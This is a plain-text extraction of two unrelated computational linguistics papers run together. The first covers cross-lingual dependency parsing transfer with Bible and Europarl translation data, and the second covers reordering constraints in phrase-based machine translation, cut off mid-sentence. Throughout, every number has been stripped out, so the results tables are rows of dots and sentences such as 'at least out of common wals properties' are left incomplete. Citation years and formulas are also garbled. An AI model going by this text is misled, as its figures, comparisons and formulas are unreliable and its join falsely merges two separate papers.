scribe an annotation projection method based on en- tropy regularization; ) lacroix et al. ( ), who lang. rc this paper (§ . ) bible europarl las uas las uas las uas en . . . . . . de . . . . . . es . . . . . . fr . . . . . . it . . . . . . pt . . . . . . sv . . . . . . avg . . . . . . table : the final results based on automatic part of speech tags. rc refers to the best performing model of rasooli and collins ( ). describe an annotation projection method based on training on partial trees with dynamic oracles; ) zhang and barzilay ( ), who describe a method that learns cross-lingual embeddings and bilingual dictionaries from europarl data, and uses these fea- tures in a discriminative parsing model; ) guo et al. ( ), who describe a method that learns cross- lingual embeddings from europarl data and uses a shift-reduce neural parser with these representa- tions; ) ammar et al. ( b) , who use the same embeddings as guo et al. ( ), within an lstm- based parser; and ) rasooli and collins ( ) who use the density-driven approach on the europarl data. our method gives significant improvements over the first three models, in spite of using the bible translation data rather than europarl. when using the europarl data, our method improves the state-of- the-art model of rasooli and collins ( ). performance with automatic pos tags for completeness, table gives results for our method with automatic part-of-speech tags. the tags are ob- tained using the model of collins ( ) trained on the training part of the treebank dataset. future work should study approaches that transfer pos tags in addition to dependencies. . results on the universal dependencies v . table gives results on datasets ( languages) from the newly released universal dependencies cor- pus (nivre et al., ). given the number of tree- banks and to speed up training, we pick source lan- this work was later published under a different title (am- mar et al., a) without including uas results. https://github.com/rasoolims/ semisupervisedpostagger dataset density this paper supervised las uas las uas las uas it . . . . . . sl . . . . . . es . . . . . . bg . . . . . . pt . . . . . . es-ancora . . . . . . fr . . . . . . sv-lines . . . . . . pt-br . . . . . . sv . . . . . . no . . . . . . pl . . . . . . hr . . . . . . cs-cac . . . . . . da . . . . . . en-lines . . . . . . cs . . . . . . id . . . . . . de . . . . . . ru-syntagrus . . . . . . ru . . . . . . cs-cltt . . . . . . ro . . . . . . la . . . . . . nl-lassysmall . . . . . . el . . . . . . et . . . . . . hi . . . . . . hu . . . . . . en . . . . . . fi-ftb . . . . . . fi . . . . . . la-ittb . . . . . . nl . . . . . . la-proiel . . . . . . sl-sst . . . . . . fa . . . . . . tr . . . . . . average . . . . . . table : results for the density driven method (rasooli and collins, ) and ours using the bible data on the universal dependencies v . (nivre et al., ). the ta- ble is sorted by the performance of our method. the last major columns shows the performance of the supervised parser. the abbreviations are as follows: bg (bulgarian), cs (czech), da (danish), de (german), el (greek), en (en- glish), es (spanish), et (estonian), fa (persian (farsi)), fi (finnish), fr (french), hi (hindi), hr (croatian), hu (hun- garian), id (indonesian), it (italian), la (latin), nl (dutch), no (norwegian), pl (polish), pt (portuguese), ro (roma- nian), ru (russian), sl (slovenian), sv (swedish), and tr (turkish). all differences in las and uas in this ta- ble were found to be statistically significant according to mcnemar’s sign test with p < . . guages that have at least out of common wals properties with each target language. our experi- ments are carried out using the bible as our transla- tion data. as shown in table , our method consis- tently outperforms the density-driven method of ra- sooli and collins ( ) and for many languages the accuracy of our method gets close to the accuracy of the supervised parser. in all the languages, our method is significantly better than the density-driven method using the mcnemar’s test with p < . . accuracy on some languages (e.g., persian (fa) and turkish (tr)) is low, suggesting that future work should consider more powerful techniques for these languages. there are two important facts to note. first, the number of fully projected trees in some languages is so low such that the density-driven ap- proach cannot start with a good initialization to fill in partial dependencies. for example turkish has only one full tree with only six words, persian with trees, and dutch with trees. second, we ob- serve very low accuracies in supervised parsing for some languages in which the number of training sen- tences is very low (for example, latin has only projective trees in the training data). analysis we conclude with some analysis of the accuracy of the method on different dependency types, across the different languages. table shows precision and recall on different dependency types in english (using the google treebank). the improvements in accuracy when moving from the delexicalized model to the bible or europarl model apply quite uniformly across all dependency types, with all de- pendency labels showing an improvement. table shows the dependency accuracy sorted by part-of-speech tag of the modifier in the depen- dency. we break the results into three groups: g languages, where uas is at least % overall; g languages, where uas is between % and %; and g languages, where uas is less than %. there are some quite significant differences in ac- curacy depending on the pos of the modifier word. in the g languages, for example, adp, det, adj, pron and aux all have over % accuracy; in con- trast noun, verb, propn, adv all have accu- racy that is less than %. a very similar pattern is seen for the g languages, with adp, det, adj, and aux again having greater than % accuracy, but noun, verb, propn and adv having lower accuracies. these results suggest that difficulty varies quite significantly depending on the modifier pos, and different languages show the same pat- terns of difficulty with respect to the modifier pos. table shows accuracy sorted by the pos tag of the head word of the dependency. by far the most frequent head pos tags are noun, verb, and propn (accounting for % of all dependen- cies). the table also shows that for all language groups g , g , and g , the f scores for noun, verb and propn are generally higher than the f scores for other head pos tags. finally, table shows precision and recall for different dependency labels for the g , g and g languages. we again see quite large differences in accuracy between different dependency labels. the g language dependencies, with the most frequent label nmod, has an f-score of . . in contrast, the second most frequent label, case, has . f-score. other frequent labels with low accuracy in the g languages are advmod, conj, and cc. related work there has recently been a great deal of work on syntactic transfer. a number of methods (zeman and resnik, ; mcdonald et al., ; cohen et al., ; naseem et al., ; täckström et al., ; rosa and zabokrtsky, ) directly learn delexicalized models that can be trained on universal treebank data from one or more source languages, then applied to the target language. more recent work has introduced cross-lingual representations— for example cross-lingual word-embeddings—that can be used to improve performance (zhang and barzilay, ; guo et al., ; duong et al., a; duong et al., b; guo et al., ; am- mar et al., b). these cross-lingual represen- tations are usually learned from parallel translation data. we show results of several methods (zhang and barzilay, ; guo et al., ; ammar et al., b) in table of this paper. the annotation projection approach, where de- pendencies from one language are transferred through translation alignments to another language, has been considered by several authors (hwa et al., ; ganchev et al., ; mcdonald et al., ; ma and xia, ; rasooli and collins, ; dependency freq delexicalized bible europarl prec./rec. f prec./rec. f prec./rec. f adpmod . . / . . . / . . . / . . adpobj . . / . . . / . . . / . . det . . / . . . / . . . / . . compmod . . / . . . / . . . / . . nsubj . . / . . . / . . . / . . amod . . / . . . / . . . / . . root . . / . . . / . . . / . . num . . / . . . / . . . / . . dobj . . / . . . / . . . / . . advmod . . / . . . / . . . / . . aux . . / . . . / . . . / . . cc . . / . . . / . . . / . . conj . . / . . . / . . . / . . dep . . / . . . / . . . / . . poss . . / . . . / . . . / . . ccomp . . / . . . / . . . / . . adp . . / . . . / . . . / . . nmod . . / . . . / . . . / . . xcomp . . / . . . / . . . / . . mark . . / . . . / . . . / . . advcl . . / . . . / . . . / . . appos . . / . . . / . . . / . . auxpass . . / . . . / . . . / . . rcmod . . / . . . / . . . / . . nsubjpass . . / . . . / . . . / . . acomp . . / . . . / . . . / . . adpcomp . . / . . . / . . . / . . partmod . . / . . . / . . . / . . attr . . / . . . / . . . / . . neg . . / . . . / . . . / . . prt . . / . . . / . . . / . . infmod . . / . . . / . . . / . . expl . . / . . . / . . . / . . iobj . . / . . . / . . . / . . mwe . . / . . . / . . . / . . parataxis . . / . . . / . . . / . . cop . . / . . . / . . . / . . csubj . . / . . . / . . . / . . csubjpass . . / . . . / . . . / . . rel . . / . . . / . . . / . . table : precision, recall and f-score of different depen- dency relations on the english development data of the google universal treebank. the major columns show the dependency labels (“dep.”), frequency (“freq.”), the base- line delexicalized model (“delex”), and our method using the bible and europarl (“eu”) as translation data. the rows are sorted by frequency. lacroix et al., ; agić et al., ; schlichtkrull and søgaard, ). other recent work (tiedemann et al., ; tiede- mann, ; tiedemann and agić, ) has con- sidered treebank translation, where a statistical ma- chine translation system (e.g., moses (koehn et al., )) is used to translate a source language treebank into the target language, complete with re- ordering of the input sentence. the lexicalization pos g g g freq% acc. freq% acc. freq% acc. noun . . . . . . adp . . . . . . det . . . . . . verb . . . . . . propn . . . . . . adj . . . . . . pron . . . . . . adv . . . . . . conj . . . . . . aux . . . . . . num . . . . . . sconj . . . . . . part . . . . . . x . . . . . . sym . . . . . . intj . . . . . . table : accuracy of unlabeled dependencies by pos of the modifier word, for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. approach described in this paper is a simple form of treebank translation, where we use a word-to-word translation model. in spite of its simplicity, it is an effective approach. a number of authors have considered incorporat- ing universal syntactic properties, such as depen- dency order, by selectively learning syntactic at- tributes from similar source languages (naseem et al., ; täckström et al., ; zhang and barzi- lay, ; ammar et al., a). selective shar- ing of syntactic properties is complementary to our work. we used a very limited form of selective shar- ing, through the wals properties, in our baseline approach. more recently, wang and eisner ( ) have developed a synthetic treebank as a universal treebank to help learn parsers for new languages. martı́nez alonso et al. ( ) try a very different approach in cross-lingual transfer by using a rank- ing approach. a number of authors (täckström et al., ; guo et al., ; guo et al., ) have introduced methods that learn cross-lingual representations that are then used in syntactic transfer. most of these approaches introduce constraints to a clustering or embedding algorithm that encourage words that are translations of each other to have similar represen- tations. our method of deriving a cross-lingual cor- pos g g g freq% prec. rec. f freq% prec. rec. f freq% prec. rec. f noun . . . . . . . . . . . . verb . . . . . . . . . . . . propn . . . . . . . . . . . . adj . . . . . . . . . . . . pron . . . . . . . . . . . . num . . . . . . . . . . . . adv . . . . . . . . . . . . adp . . . . . . . . . . . . sym . . . . . . . . . . . . det . . . . . . . . . . . . aux . . . . . . . . . . . . x . . . . . . . . . . . . sconj . . . . . . . . . . . . part . . . . . . . . . . . . conj . . . . . . . . . . . . intj . . . . . . . . . . . . table : precision, recall and f-score of unlabeled dependency attachment for different pos tags as head for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. pus (see figure ) is closely related to duong et al. ( a); gouws and søgaard ( ); and wick et al. ( ). our work has made use of dictionaries that are automatically extracted from bilingual corpora. an alternative approach would be to use hand-crafted translation lexicons, for example, panlex (bald- win et al., ) (e.g. see duong et al. ( b)), which covers language varieties, google trans- late (e.g., see ammar et al. ( c)), or wiktionary (e.g., see durrett et al. ( ) for an approach that uses wiktionary for cross-lingual transfer). these resources are potentially very rich sources of in- formation. future work should investigate whether they can give improvements in performance. conclusions we have described a method for cross-lingual syn- tactic transfer that is effective in a scenario where a large amount of translation data is not available. we have introduced a simple, direct method for deriving cross-lingual clusters, and for transferring lexical in- formation across treebanks for different languages. experiments with this method show that the method gives improved performance over previous work that makes use of europarl, a much larger translation cor- pus. acknowledgement we thank the anonymous reviewers for their valu- able feedback. we also thank ryan mcdonald, karl stratos and oscar täckström for their comments on the first draft. appendix a parsing features we used all features in zhang and nivre ( , ta- ble and ), which describes features based on the word and part-of-speech at various positions on the stack and buffer of the transition system. in addi- tion, we expand the zhang and nivre ( , table ) features to include clusters, as follows: whenever a feature tests the part-of-speech for a word in po- sition of the stack or buffer, we introduce features that replace the part-of-speech with the brown clus- tering bit-string of length and . whenever a fea- ture tests for the word identity at position of the stack or buffer, we introduce a cluster feature that replaces the word with the full cluster feature. we take the cross product of all features corresponding to the choice of or length bit string for part-of- speech features. references željko agić, anders johannsen, barbara plank, héctor alonso martı́nez, natalie schluter, and an- ders søgaard. . multilingual projection for dep. g g g freq% prec. rec. f freq% prec. rec. f freq% prec. rec. f nmod . . . . . . . . . . . . case . . . . . . . . . . . . det . . . . . . . . . . . . nsubj . . . . . . . . . . . . amod . . . . . . . . . . . . dobj . . . . . . . . . . . . root . . . . . . . . . . . . advmod . . . . . . . . . . . . conj . . . . . . . . . . . . cc . . . . . . . . . . . . mark . . . . . . . . . . acl . . . . . . . . . . . . aux . . . . . . . . . . . . name . . . . . . . . . . . . cop . . . . . . . . . . . nummod . . . . . . . . . . . . advcl . . . . . . . . . . . . appos . . . . . . . . . . . . mwe . . . . . . . . . . . . xcomp . . . . . . . . . . . . ccomp . . . . . . . . . . . . neg . . . . . . . . . . . iobj . . . . . . . . . . . . expl . . . . . . . . . . . auxpass . . . . . . . . . . . . nsubjpass . . . . . . . . . . . . parataxis . . . . . . . . . . . . compound . . . . . . . . . . . . csubj . . . . . . . . . . . . dep . . . . . . . . . . . . discourse . . . . . . . . . . . . foreign . . . . . . . . . . . . goeswith . . . . . . . . . . . . csubjpass . . . . . . . . . . . . list . – – – . . . . . . . . remnant . . . . . . . . . . . . reparandum . – – – . – – – . . . . vocative . . . . . . . . . . . . dislocated . . . . . . . . . . . . table : precision, recall and f-score for different dependency labels for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. parsing truly low-resource languages. transactions of the association for computational linguistics, : – . waleed ammar, george mulcaire, miguel ballesteros, chris dyer, and noah smith. a. many languages, one parser. transactions of the association for com- putational linguistics, : – . waleed ammar, george mulcaire, miguel ballesteros, chris dyer, and noah a. smith. b. one parser, many languages. arxiv preprint arxiv: . v . waleed ammar, george mulcaire, yulia tsvetkov, guil- laume lample, chris dyer, and noah a. smith. c. massively multilingual word embeddings. arxiv preprint arxiv: . . timothy baldwin, jonathan pool, and susan m colow- ick. . panlex and lextract: translating all words of all languages of the world. in proceedings of the rd international conference on computational linguistics: demonstrations, pages – . associa- tion for computational linguistics. peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . jinho d. choi, joel tetreault, and amanda stent. . it depends: dependency parser comparison using a web-based evaluation tool. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federa- tion of natural language processing, acl, pages – . christos christodouloupoulos and mark steedman. . a massively parallel corpus: the bible in languages. language resources and evaluation, pages – . shay b. cohen, dipanjan das, and noah a. smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scotland, uk., july. association for computational linguistics. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . association for computational linguistics, july. matthew s. dryer and martin haspelmath, editors. . wals online. max planck institute for evolutionary anthropology, leipzig. long duong, trevor cohn, steven bird, and paul cook. a. cross-lingual transfer for unsupervised depen- dency parsing without parallel data. in proceedings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguistics. long duong, trevor cohn, steven bird, and paul cook. b. a neural network model for low-resource uni- versal dependency parsing. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, por- tugal, september. association for computational lin- guistics. greg durrett, adam pauls, and dan klein. . syntac- tic transfer using a bilingual lexicon. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , jeju island, korea, july. association for computational linguis- tics. kuzman ganchev, jennifer gillenwater, and ben taskar. . dependency grammar induction via bitext pro- jection constraints. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. stephan gouws and anders søgaard. . simple task- specific bilingual word embeddings. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , den- ver, colorado, may–june. association for computa- tional linguistics. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . cross-lingual dependency parsing based on distributed representations. in pro- ceedings of the rd annual meeting of the associa- tion for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . a representation learning framework for multi-source transfer parsing. in the thirtieth aaai conference on artificial intelligence (aaai- ), phoenix, arizona, usa. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ): – . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, et al. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meet- ing of the acl on interactive poster and demonstra- tion sessions, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. philipp koehn. . europarl: a parallel corpus for sta- tistical machine translation. in mt summit, volume , pages – . ophélie lacroix, lauriane aufrant, guillaume wis- niewski, and françois yvon. . frustratingly easy cross-lingual transfer for transition-based dependency parsing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , san diego, california, june. association for computational linguistics. percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : long papers), pages – , baltimore, maryland, june. asso- ciation for computational linguistics. héctor martı́nez alonso, željko agić, barbara plank, and anders søgaard. . parsing universal de- pendencies without training. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics: volume , long papers, pages – . association for compu- tational linguistics. david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in pro- ceedings of the main conference on human language technology conference of the north american chap- ter of the association of computational linguistics, hlt-naacl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, scotland, uk., july. associ- ation for computational linguistics. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, et al. . universal dependency annotation for multilin- gual parsing. in proceedings of the st annual meet- ing of the association for computational linguistics (volume : short papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proceedings of the th annual meet- ing of the association for computational linguistics: long papers-volume , pages – . association for computational linguistics. joakim nivre, željko agić, lars ahrenberg, maria jesus aranzabe, masayuki asahara, et al. . universal dependencies . . lindat/clarin digital library at institute of formal and applied linguistics, charles university in prague. franz josef och and hermann ney. . a system- atic comparison of various statistical alignment mod- els. computational linguistics, ( ): – . mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of dependency parsers. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal, september. associ- ation for computational linguistics. mohammad sadegh rasooli and joel tetreault. . yara parser: a fast and accurate dependency parser. arxiv preprint arxiv: . . rudolf rosa and zdenek zabokrtsky. . klcpos - a language similarity measure for delexicalized parser transfer. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : short papers), pages – , beijing, china, july. association for com- putational linguistics. michael schlichtkrull and anders søgaard. . cross- lingual dependency parsing with late decoding for truly low-resource languages. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics: volume , long papers, pages – . association for compu- tational linguistics. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proceedings of the con- ference of the north american chapter of the associ- ation for computational linguistics: human language technologies, pages – . association for compu- tational linguistics. oscar täckström, ryan mcdonald, and joakim nivre. . target language adaptation of discriminative transfer parsers. in proceedings of the con- ference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , atlanta, geor- gia, june. association for computational linguistics. jörg tiedemann and željko agić. . synthetic tree- banking for cross-lingual dependency parsing. jour- nal of artificial intelligence research, : – . jörg tiedemann, željko agić, and joakim nivre. . treebank translation for cross-lingual parser induc- tion. in proceedings of the eighteenth conference on computational natural language learning, pages – , ann arbor, michigan, june. association for computational linguistics. jörg tiedemann. . improving the cross-lingual pro- jection of syntactic dependencies. in nordic confer- ence of computational linguistics nodalida , pages – . dingquan wang and jason eisner. . the galactic dependencies treebanks: getting more data by synthe- sizing new languages. transactions of the association for computational linguistics, : – . michael wick, pallika kanani, and adam pocock. . minimally-constrained multilingual embeddings via artificial code-switching. in workshop on transfer and multi-task learning: trends and new perspec- tives, montreal, canada, december. min xiao and yuhong guo. . annotation projection-based representation learning for cross- lingual dependency parsing. in proceedings of the nineteenth conference on computational natu- ral language learning, pages – , beijing, china, july. association for computational linguistics. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in pro- ceedings of the ijcnlp- workshop on nlp for less privileged languages, pages – . yuan zhang and regina barzilay. . hierarchi- cal low-rank tensors for multilingual transfer parsing. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal, september. association for computational linguistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon, usa, june. association for computational lin- guistics. dynamically shaping the reordering search space of phrase-based statistical machine translation arianna bisazza and marcello federico fondazione bruno kessler trento, italy {bisazza,federico}@fbk.eu abstract defining the reordering search space is a cru- cial issue in phrase-based smt between dis- tant languages. in fact, the optimal trade- off between accuracy and complexity of de- coding is nowadays reached by harshly lim- iting the input permutation space. we pro- pose a method to dynamically shape such space and, thus, capture long-range word movements without hurting translation qual- ity nor decoding time. the space defined by loose reordering constraints is dynamically pruned through a binary classifier that predicts whether a given input word should be trans- lated right after another. the integration of this model into a phrase-based decoder im- proves a strong arabic-english baseline al- ready including state-of-the-art early distor- tion cost (moore and quirk, ) and hierar- chical phrase orientation models (galley and manning, ). significant improvements in the reordering of verbs are achieved by a sys- tem that is notably faster than the baseline, while bleu and meteor remain stable, or even increase, at a very high distortion limit. introduction word order differences are among the most impor- tant factors determining the performance of statisti- cal machine translation (smt) on a given language pair (birch et al., ). this is particularly true in the framework of phrase-based smt (psmt) (zens et al., ; koehn et al., ; och and ney, ), an approach that remains highly competitive despite the recent advances of the tree-based approaches. during the psmt decoding process, the output sentence is built from left to right, while the input sentence positions can be covered in different or- ders. thus, reordering in psmt can be viewed as the problem of choosing the input permutation that leads to the highest-scoring output sentence. due to efficiency reasons, however, the input permutation space cannot be fully explored, and is therefore lim- ited with hard reordering constraints. although many solutions have been proposed to explicitly model word reordering during decoding, psmt still largely fails to handle long-range word movements in language pairs with different syntac- tic structures . we believe this is mostly not due to deficiencies of the existing reordering models, but rather to a very coarse definition of the reorder- ing search space. indeed, the existing reordering constraints are rather simple and typically based on word-to-word distances. moreover, they are uni- form throughout the input sentence and insensitive to the actual words being translated. relaxing this kind of constraints means dramatically increasing the size of the search space and making the reorder- ing model’s task extremely complex. as a result, even in language pairs where long reordering is reg- ularly observed, psmt quality degrades when long word movements are allowed to the decoder. we address this problem by training a binary classifier to predict whether a given input position should be translated right after another, given the words at those positions and their contexts. when this model is integrated into the decoder, its predic- for empirical evidence, see for instance (birch et al., ; galley and manning, ; bisazza and federico, ). transactions of the association for computational linguistics, ( ) – . action editor: philipp koehn. submitted / ; revised / ; published / . c© association for computational linguistics. tions can be used not only as an additional feature function, but also as an early indication of whether or not a given reordering path should be further ex- plored. more specifically, at each hypothesis ex- pansion, we consider the set of input positions that are reachable according to the usual reordering con- straints, and prune it based only on the reorder- ing model score. then, the hypothesis can be ex- panded normally by covering the non-pruned posi- tions. this technique makes it possible to dynami- cally shape the search space while decoding with a very high distortion limit, which can improve trans- lation quality and efficiency at the same time. the remainder of the paper is organized as fol- lows. after an overview of the relevant literature, we describe in detail our word reordering model. in the following section, we introduce early pruning of reordering steps as a way to dynamically shape the input permutation space. finally, we present an em- pirical analysis of our approach, including intrinsic evaluation of the model and smt experiments on a well-known arabic-english news translation task. previous work in this paper, we focus on methods that guide the reordering search during the phrase-based decoding process. see for instance (costa-jussà and fonol- losa, ) for a review of pre- and post-reordering approaches that are not treated here. assuming a one-to-one correspondence between source and target phrases, reordering in psmt can be viewed as the problem of searching through a set of permutations of the input sentence. thus, two sub-problems arise: defining the set of allowed per- mutations (reordering constraints) and scoring the allowed permutations according to some likelihood criterion (reordering model). we begin with the lat- ter, returning to the constraints later in this section. . reordering modeling in its original formulation, the psmt approach includes a basic reordering model, called distor- tion cost, that exponentially penalizes longer jumps among consecutively translated phrases (f̃i! , f̃i): d(f̃i! , f̃i) = e !|start(f̃i) ! end(f̃i! ) ! | a number of more sophisticated solutions have been proposed to explicitly model word reorder- ing during decoding. these can mostly be grouped into three families: phrase orientation models, jump models and source decoding sequence models. phrase orientation models (tillmann, ; koehn et al., ; zens and ney, ; galley and manning, ), also known as lexicalized reorder- ing models, predict the orientation of a phrase with respect to the last translated one, by classifying it as monotone, swap or discontinuous. these mod- els have proven very useful for short and medium- range reordering and are among the most widely used in psmt. however, their coarse classification of reordering steps makes them unsuitable to predict long-range reorderings. jump models (al-onaizan and papineni, ; green et al., ; yahyaei and monz, ) predict the direction and length of a jump to perform after a given input word . both these works achieve their best arabic-english results within a rather small dl: namely, in (al-onaizan and papineni, ) and in (green et al., ), thus failing to capture the rare but crucial long reorderings that were their main motivation. a drawback of this approach is that long jumps are typically penalized because of their low frequency compared to short jumps. this strong bias is undesirable, given that we are especially in- terested in detecting probable long reorderings. source decoding sequence models predict which input word is likely to be translated at a given state of decoding. for instance, reordered source lan- guage models (feng et al., ) are smoothed n- gram models trained on a corpus of source sentences reordered to match the target word order. when inte- grated into the smt system, they assign a probabil- ity to each newly translated word given the n- pre- viously translated words. finally, source word pair reordering models (visweswariah et al., ) esti- mate, for each pair of input words i and j, the cost of translating j right after i given various features of i, j and their respective contexts. differently from reordered source lms, these models are discrimina- tive and can profit from richer feature sets. at the same time, they do not employ decoding history- based features, which allows for more effective hy- in this paper, input (or source) word denotes the word at a given position of the input sentence, rather than a word type. pothesis recombination. the model we are going to present belongs to this last sub-group, which we find especially suitable to predict long reorderings. . reordering constraints the reordering constraint originally included in the psmt framework and implemented in our reference toolkit, moses (koehn et al., ), is called dis- tortion limit (dl). this consists in allowing the de- coder to skip, or jump, at most k words from the last translated phrase to the next one. more precisely, the limit is imposed on the distortion d between consec- utively translated phrases (f̃i! , f̃i): d(f̃i! , f̃i) = !!!start(f̃i) ! end(f̃i! ) ! !!! " dl limiting the input permutation space is necessary for beam-search psmt decoders to function in lin- ear time. reordering constraints are also important for translation quality because the existing models are typically not discriminative enough to guide the search over very large sets of reordering hypotheses. despite their crucial effects on the complexity of reordering modeling, though, reordering constraints have drawn less attention in the literature. the ex- isting reordering constraints are typically based on word-to-word distances – ibm (berger et al., ) and dl (koehn et al., ) – or on permutation pat- terns – itg (wu, ). both kinds of constraints are uniform throughout the input sentence, and in- sensitive to the word being translated and to its con- text. this results in a very coarse definition of the reordering search space, which is problematic in lan- guage pairs with different syntactic structures. to address this problem, yahyaei and monz ( ) present a technique to dynamically set the dl: they train a classifier to predict the most prob- able jump length after each input word, and use the predicted value as the dl after that position. un- fortunately, this method can generate inconsistent constraints leading to decoding dead-ends. as a so- lution, the dynamic dl is relaxed when needed to reach the first uncovered position. translation im- provements are reported only on a small-scale task with short sentences (btec), over a baseline that in- cludes a very simple reordering model. in our work we develop this idea further and use a reordering model to predict which specific input words, rather than input intervals, are likely be translated next. moreover, our solution is not affected by the con- straint inconsistency problem (see sect. ). in another related work, bisazza and federico ( ) generate likely reorderings of the input sen- tence by means of language-specific fuzzy rules based on shallow syntax. long jumps are then sug- gested to the psmt decoder by reducing the distor- tion cost for specific pairs of input words. in com- parison to the dynamic dl, that is a much finer way to define the reordering space, leading to consistent improvements of both translation quality and effi- ciency over a strong baseline. however, the need of specific reordering rules makes the method harder to apply to new language pairs. the waw reordering model we model reordering as the problem of deciding whether a given input word should be translated after another (word-after-word). this formulation is particularly suitable to help the decoder decide whether a reordering path is promising enough to be further explored. moreover, when translating a sentence, choosing the next source word to translate appears as a more natural problem than guessing how much to the left or to the right we should move from the current source position. the waw reordering model addresses a binary decision task through the following maximum-entropy classifier: p (ri,j =y |f j , i, j) = exp[ " m !mhm(f j , i, j, ri,j =y )]" y ! exp[ " m !mhm(f j , i, j, ri,j =y ")] where f j is a source sentence of j words, hm are feature functions and !m the corresponding feature weights. the outcome y can be either or , with ri,j = meaning that the word at position j is trans- lated right after the word at position i. our waw reordering model is strongly related to that of visweswariah et al. ( ) – hereby called travelling salesman problem (tsp) model – with few important differences: (i) we do not include in the features any explicit indication of the jump length, in order to avoid the bias on short jumps; (ii) they train a linear model with mira (cram- mer and singer, ) by minimizing the number of input words that get placed after the wrong po- sition, while we use a maximum-entropy classifier trained by maximum-likelihood; (iii) they use an off-the shelf tsp solver to find the best source sen- tence permutation and apply it as pre-processing to training and test data. by contrast, we integrate the maximum-entropy classifier directly into the smt decoder and let all its other models (phrase orien- tation, translation, target lm etc.) contribute to the final reordering decision. . features like the tsp model (visweswariah et al., ), the waw model builds on binary features similar to those typically employed for dependency parsing (mcdonald et al., ): namely, combinations of surface forms or pos tags of the words i and j and their context. our feature templates are presented in table . the main novelties with respect to the tsp model are the mixed word-pos templates (rows - ) and the shallow syntax features. in particular, we use the chunk types of i, j and their context ( - ), as well as the chunk head words of i and j ( ). fi- nally we add a feature to indicate whether the words i and j belong to the same chunk ( ). the jump orientation – forward/backward – is included in the features that represent the words comprised between i and j (rows , , , ). no explicit indication of the jump length is included in any feature. . training data to generate training data for the classifier, we first extract reference reorderings from a word-aligned parallel corpus. given a parallel sentence, differ- ent heuristics may be used to convert arbitrary word alignments to a source permutation (birch et al., ; feng et al., ; visweswariah et al., ). similarly to this last work, we compute for each source word fi the mean ai of the target positions aligned to fi, then sort the source words according to this value. as a difference, though, we do not discard unaligned words but assign them the mean using the mean of the aligned indices makes the gener- ation of reference permutations more robust to alignment er- rors. admittedly, this heuristic does not handle well the case of source words that are correctly aligned to non-consecutive tar- get words. however, this phenomenon is also not captured by standard psmt models, who only learn continuous phrases. i! i! i i+ b j! j j+ w w w w w w w w w w w w w w w w w w w w wall w w p p p p p p p p p p p p p p p p p p p p p p p p p p pall p p w p p w c c c c c c c c h h belong to same chunk(i, j)? w: word identity, p: pos tag, c: chunk type, h: chunk head table : feature templates used to learn whether a source position j is to be translated right after i. positions com- prised between i and j are denoted by b and generate two feature templates: one for each position ( and ) and one for the concatentation of them all ( and ). of their neighbouring words’ alignment means, so that a complete permutation of the source sentence (") is obtained. table (a) illustrates this procedure. given the reference permutation, we then gener- ate positive and negative training samples by simu- lating 